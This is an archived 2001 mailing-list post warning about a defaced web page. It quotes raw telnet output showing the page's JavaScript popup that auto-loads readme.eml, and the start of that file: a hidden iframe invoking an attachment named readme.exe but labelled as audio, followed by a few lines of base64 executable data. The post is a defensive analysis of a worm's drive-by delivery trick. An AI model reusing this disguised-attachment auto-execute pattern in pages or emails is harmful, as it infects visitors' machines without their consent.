On Tue, 18 Sep 2001 11:17:23 -0500, "Enrique A. Compań Gzz." <enriqueat_private> wrote: >... >Don't go there if you aren't protected. it downloads readme.eml >automatically and executes. > >It seg faults on my machine... fortunally This is what's on the page in raw form (some line breaks added): >telnet 64.218.116.235 80 >Trying 64.218.116.235... >Connected to 64.218.116.235. >Escape character is '^]'. >GET / ><html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td> ><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td> ><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td> ><p align="center"><font size=4 color=red>contact:sysadmcnat_private</html> > ><html><script language="JavaScript">window.open("readme.eml", null, >"resizable=no,top=6000,left=6000")</script></html>Connection closed by foreign host. These are the headers and a few lines of the code from the readme.eml: telnet 64.218.116.235 80 Trying 64.218.116.235... Connected to 64.218.116.235. Escape character is '^]'. GET /readme.eml MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 16:13:11 PDT